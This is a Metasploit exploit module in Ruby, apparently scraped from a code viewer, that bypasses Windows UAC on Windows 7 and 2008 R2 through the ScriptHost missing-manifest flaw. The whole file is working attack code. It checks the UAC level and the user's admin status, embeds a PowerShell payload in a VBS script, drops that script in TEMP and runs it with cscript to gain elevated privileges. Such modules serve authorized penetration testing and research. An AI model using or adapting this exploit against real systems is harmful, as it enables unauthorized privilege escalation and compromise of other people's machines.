Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Exploit::FileDropper9include Exploit::Powershell10include Post::File11include Post::Windows::Priv12include Post::Windows::Runas1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',19'Description' => %q{20This module will bypass Windows UAC by utilizing the missing .manifest on the script host21cscript/wscript.exe binaries.22},23'License' => MSF_LICENSE,24'Author' => [25'Vozzie',26'Ben Campbell'27],28'Platform' => [ 'win' ],29'SessionTypes' => [ 'meterpreter' ],30'Targets' => [31[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]32],33'DefaultTarget' => 0,34'References' => [35['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],36['URL', 'https://github.com/Vozzie/uacscript']37],38'DisclosureDate' => '2015-08-22',39'Notes' => {40'Reliability' => UNKNOWN_RELIABILITY,41'Stability' => UNKNOWN_STABILITY,42'SideEffects' => UNKNOWN_SIDE_EFFECTS43}44)45)46end4748def exploit49# Validate that we can actually do things before we bother50# doing any more work51validate_environment!52check_permissions!5354# get all required environment variables in one shot instead. This55# is a better approach because we don't constantly make calls through56# the session to get the variables.57env_vars = get_envs('TEMP', 'WINDIR')5859case get_uac_level60when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,61UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,62UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT63fail_with(Failure::NotVulnerable,64"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")65when UAC_DEFAULT66print_good('UAC is set to Default')67print_good('BypassUAC can bypass this setting, continuing...')68when UAC_NO_PROMPT69print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')70shell_execute_exe71return72end7374vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"7576upload_vbs(vbs_filepath)7778cmd_exec("cscript.exe //B #{vbs_filepath}")79end8081def check_permissions!82# Check if you are an admin83vprint_status('Checking admin status...')84admin_group = is_in_admin_group?8586if admin_group.nil?87print_error('Either whoami is not there or failed to execute')88print_error('Continuing under assumption you already checked...')89elsif admin_group90print_good('Part of Administrators group! Continuing...')91else92fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')93end9495if get_integrity_level == INTEGRITY_LEVEL_SID[:low]96fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')97end98end99100def upload_vbs(payload_filepath)101vbs = File.read(File.join(Msf::Config.data_directory,102'exploits',103'scripthost_uac_bypass',104'bypass.vbs'))105106command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)107108vbs.gsub!('COMMAND', command)109print_status('Uploading the Payload VBS to the filesystem...')110begin111vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")112write_file(payload_filepath, vbs)113register_file_for_cleanup(payload_filepath)114rescue Rex::Post::Meterpreter::RequestError => e115fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")116end117end118119def validate_environment!120fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?121122version = get_version_info123if version.win7_or_2008r2?124print_good("#{version.product_name} may be vulnerable.")125else126fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")127end128129if is_uac_enabled?130print_status('UAC is Enabled, checking level...')131else132unless is_in_admin_group?133fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')134end135end136end137end138139140